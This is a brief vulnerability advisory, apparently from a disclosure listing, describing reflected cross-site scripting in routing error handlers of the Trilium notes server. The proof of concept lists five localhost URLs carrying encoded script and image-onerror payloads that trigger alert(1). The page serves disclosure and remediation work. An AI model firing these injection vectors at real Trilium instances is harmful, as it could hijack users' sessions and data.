Multiple Reflected XSS Vulnerabilities in error handlers

Main / Multiple Reflected XSS Vulnerabilities in error handlers

Discription

# Description
Multiple routing error handlers are vulnerable to reflected XSS.

# Proof of Concept
Deploy `trilium` server and access to these endpoint will execute the alert js function.
“`
https://localhost:8080/custom/%3Cscript%3Ealert(1)%3C/script%3E
https://localhost:8080/share/api/notes/%3Cimg%20src=x%20onerror=alert(1)%3E
https://localhost:8080/share/api/notes/%3Cimg%20src=x%20onerror=alert(1)%3E/download
https://localhost:8080/share/api/images/%3Cimg%20src=x%20onerror=alert(1)%3E/filename
https://localhost:8080/share/api/notes/%3Cimg%20src=x%20onerror=alert(1)%3E/view
“`Read More

References

Back to Main

Subscribe for the latest news: